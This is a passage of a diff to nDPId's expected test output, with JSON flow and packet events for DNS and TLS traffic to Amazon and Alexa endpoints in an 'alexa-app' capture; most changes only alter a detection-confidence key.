L=Seattle, O=Amazon.com, Inc., CN=cognito-identity.us-east-1.amazonaws.com","alpn":"h2,http\/1.1","fingerprint":"56:17:8F:E9:45:10:32:78:FF:FD:E3:09:60:5A:B5:3B:8D:8C:F8:34"}} +00883{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":161,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976035553,"flow_last_seen":1490976035616,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":228,"flow_tot_l4_payload_len":228,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1490976035616,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38363,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cognito-identity.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00940{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":163,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976035553,"flow_last_seen":1490976035733,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1676,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1490976035733,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38363,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cognito-identity.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01327{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":165,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976035553,"flow_last_seen":1490976035733,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3617,"flow_avg_l4_payload_len":452,"midstream":0,"thread_ts_msec":1490976035733,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38363,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cognito-identity.us-east-1.amazonaws.com","server_names":"cognito-identity.amazonaws.com,cognito-identity.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=cognito-identity.us-east-1.amazonaws.com","alpn":"h2,http\/1.1","fingerprint":"56:17:8F:E9:45:10:32:78:FF:FD:E3:09:60:5A:B5:3B:8D:8C:F8:34"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":182,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976037754,"flow_last_seen":1490976037754,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976037754,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38364,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":182,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1490976037754,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976037754,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8+KpAAEAGE3KsECrYIsc08JXcAbvRHbWkAAAAAKAC\/\/+tAQAAAgQFtAQCCAoA9k0OAAAAAAEDAwg="} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":183,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1490976037803,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976037803,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAOoGYhwixzTwrBAq2AG7ldw4CtRs0R21paASaN+cagAAAgQFtAQCCApEF1cYAPZNDgEDAwg="} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":184,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1490976037807,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976037807,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0+KtAAEAGE3msECrYIsc08JXcAbvRHbWlOArUbYAQAVcyugAAAQEICgD2TRREF1cY"} -00883{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":185,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976037754,"flow_last_seen":1490976037809,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1490976037809,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38364,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cognito-identity.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00937{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":187,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976037754,"flow_last_seen":1490976037920,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":405,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1490976037920,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38364,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cognito-identity.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +00883{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":185,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976037754,"flow_last_seen":1490976037809,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1490976037809,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38364,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cognito-identity.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00937{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":187,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976037754,"flow_last_seen":1490976037920,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":405,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1490976037920,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38364,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cognito-identity.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":195,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041150,"flow_last_seen":1490976041150,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1490976041150,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":54886,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":195,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1490976041150,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1490976041150,"pkt":"AMDKkaPvePiC0\/vCCABFAABBWlNAAEARM1+sECrYrBAqAdZmADUALY4\/ocgBAAABAAAAAAAACHBpdGFuZ3VpBmFtYXpvbgNjb20AAAEAAQ=="} -00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":195,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041150,"flow_last_seen":1490976041150,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1490976041150,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":54886,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"pitangui.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":195,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041150,"flow_last_seen":1490976041150,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1490976041150,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":54886,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"pitangui.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":196,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1490976041151,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1490976041151,"pkt":"ePiC0\/vCAMDKkaPvCABFAABR0jdAAEARu2qsECoBrBAq2AA11mYAPRDBociBgAABAAEAAAAACHBpdGFuZ3VpBmFtYXpvbgNjb20AAAEAAcAMAAEAAQAAAAUABDRe6IY="} -00793{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":196,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976041150,"flow_last_seen":1490976041151,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1490976041151,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":54886,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"pitangui.amazon.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.94.232.134"}} +00793{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":196,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976041150,"flow_last_seen":1490976041151,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1490976041151,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":54886,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"pitangui.amazon.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.94.232.134"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":197,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041156,"flow_last_seen":1490976041156,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976041156,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45661,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":197,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1490976041156,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976041156,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8TnBAAEAG+H6sECrYNF7ohrJdAbvhYQATAAAAAKAC\/\/9vSwAAAgQFtAQCCAoA9k5jAAAAAAEDAwg="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":198,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1490976041212,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976041212,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwBzRAAOcGmMY0XuiGrBAq2AG7sl2f4NcN4WEAFHASH\/5jwQAAAgQFtAEDAwY="} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":199,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1490976041215,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976041215,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoTnFAAEAG+JGsECrYNF7ohrJdAbvhYQAUn+DXDlAQAVeuMgAA"} -00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":200,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976041156,"flow_last_seen":1490976041217,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":207,"flow_tot_l4_payload_len":207,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976041217,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45661,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01630{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":203,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976041156,"flow_last_seen":1490976041279,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3472,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1490976041279,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45661,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","server_names":"pitangui.amazon.com,guipitan.amazon.com,alexa.amazon.com,echo.amazon.com,alexa.amazon.ca,guipitan.amazon.ca,alexa.amazon.co.jp,guipitan.amazon.co.jp,alexa.amazon.com.mx,guipitan.amazon.com.mx,alexa.amazon.com.br,guipitan.amazon.com.br,alexa.amazon.com.au,guipitan.amazon.com.au,alexa.amazon.cn,guipitan.amazon.cn","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=pitangui.amazon.com","alpn":"h2,http\/1.1","fingerprint":"13:E9:3B:22:22:61:41:53:CA:B6:3A:AE:C8:B7:23:FB:A5:11:2F:24"}} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":200,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976041156,"flow_last_seen":1490976041217,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":207,"flow_tot_l4_payload_len":207,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976041217,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45661,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01630{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":203,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976041156,"flow_last_seen":1490976041279,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3472,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1490976041279,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45661,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","server_names":"pitangui.amazon.com,guipitan.amazon.com,alexa.amazon.com,echo.amazon.com,alexa.amazon.ca,guipitan.amazon.ca,alexa.amazon.co.jp,guipitan.amazon.co.jp,alexa.amazon.com.mx,guipitan.amazon.com.mx,alexa.amazon.com.br,guipitan.amazon.com.br,alexa.amazon.com.au,guipitan.amazon.com.au,alexa.amazon.cn,guipitan.amazon.cn","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=pitangui.amazon.com","alpn":"h2,http\/1.1","fingerprint":"13:E9:3B:22:22:61:41:53:CA:B6:3A:AE:C8:B7:23:FB:A5:11:2F:24"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":210,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041384,"flow_last_seen":1490976041384,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976041384,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45662,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":210,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1490976041384,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976041384,"pkt":"AMDKkaPvePiC0\/vCCABFAAA807JAAEAGczysECrYNF7ohrJeAbv1uZ3IAAAAAKAC\/\/+9JQAAAgQFtAQCCAoA9k56AAAAAAEDAwg="} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":213,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041400,"flow_last_seen":1490976041400,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976041400,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45663,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -159,82 +159,82 @@ 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":216,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1490976041437,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1490976041437,"pkt":"ePiC0\/vCAMDKkVoBCABFEAAoAABAAD0Gmy7AqAsBrBAq2B+QlfcAAAAAG6PI3FAUAABzNwAAAAAAAAAA"} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":217,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1490976041439,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976041439,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwm7lAAOcGBEE0XuiGrBAq2AG7sl5u82R89bmdyXASH\/5VMQAAAgQFtAEDAwY="} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":218,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1490976041440,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976041440,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo07NAAEAGc0+sECrYNF7ohrJeAbv1uZ3JbvNkfVAQAVefogAA"} -00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":219,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976041384,"flow_last_seen":1490976041444,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976041444,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45662,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":219,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976041384,"flow_last_seen":1490976041444,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976041444,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45662,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":220,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1490976041446,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976041446,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwNmhAAOcGaZI0XuiGrBAq2AG7sl88IzNAq4r0I3ASH\/6tEQAAAgQFtAEDAwY="} 